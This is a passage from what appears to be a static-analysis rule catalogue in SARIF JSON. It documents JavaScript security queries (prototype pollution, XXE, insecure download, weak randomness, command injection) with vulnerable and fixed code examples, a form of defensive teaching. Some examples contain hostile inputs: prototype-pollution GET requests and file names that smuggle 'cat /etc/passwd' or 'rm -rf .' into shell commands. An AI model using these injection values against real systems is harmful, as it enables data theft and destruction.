[CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Recursively merging a user-controlled object into another object\n can allow an attacker to modify the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", + "id" : "js/prototype-pollution", + "kind" : "path-problem", + "name" : "Prototype-polluting merge call", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/insecure-download", + "name" : "js/insecure-download", + "shortDescription" : { + "text" : "Download of sensitive file through insecure connection" + }, + "fullDescription" : { + "text" : "Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", + "markdown" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-829" ], + "description" : "Downloading executables and other sensitive files over an insecure connection\n opens up for potential man-in-the-middle attacks.", + "id" : "js/insecure-download", + "kind" : "path-problem", + "name" : "Download of sensitive file through insecure connection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.1" + } + }, { + "id" : "js/xxe", + "name" : "js/xxe", + "shortDescription" : { + "text" : "XML external entity expansion" + }, + "fullDescription" : { + "text" : "Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n", + "markdown" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-611", "external/cwe/cwe-827" ], + "description" : "Parsing user input as an XML document with external\n entity expansion is vulnerable to XXE attacks.", + "id" : "js/xxe", + "kind" : "path-problem", + "name" : "XML external entity expansion", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/insecure-randomness", + "name" : "js/insecure-randomness", + "shortDescription" : { + "text" : "Insecure randomness" + }, + "fullDescription" : { + "text" : "Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n", + "markdown" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-338" ], + "description" : "Using a cryptographically weak pseudo-random number generator to generate a\n security-sensitive value may allow an attacker to predict what value will\n be generated.", + "id" : "js/insecure-randomness", + "kind" : "path-problem", + "name" : "Insecure randomness", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/insufficient-key-size", + "name" : "js/insufficient-key-size", + "shortDescription" : { + "text" : "Use of a weak cryptographic key" + }, + "fullDescription" : { + "text" : "Using a weak cryptographic key can allow an attacker to compromise security." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n", + "markdown" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-326" ], + "description" : "Using a weak cryptographic key can allow an attacker to compromise security.", + "id" : "js/insufficient-key-size", + "kind" : "problem", + "name" : "Use of a weak cryptographic key", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/shell-command-injection-from-environment", + "name" : "js/shell-command-injection-from-environment", + "shortDescription" : { + "text" : "Shell command built from environment values" + }, + "fullDescription" : { + "text" : "Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Building a shell command string with values from the enclosing\n environment may cause subtle bugs or vulnerabilities.", + "id" : "js/shell-command-injection-from-environment", + "kind" : "path-problem", + "name" : "Shell command built from environment values", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/second-order-command-line-injection", + "name" : "js/second-order-command-line-injection", + "shortDescription" : { + "text" : "Second order command injection" + }, + "fullDescription" : { + "text" : "Using user-controlled data as arguments to some commands, such as git clone, can allow arbitrary commands to be executed." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using user-controlled data as arguments to some commands, such as git clone,\n can allow arbitrary commands to be executed.", + "id" : "js/second-order-command-line-injection", + "kind" : "path-problem", + "name" : "Second order command injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.0" + } + }, { + "id" : "js/command-line-injection", + "name" : "js/command-line-injection", + "shortDescription" : { + "text" : "Uncontrolled command line" + }, + "fullDescription" : { + "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single 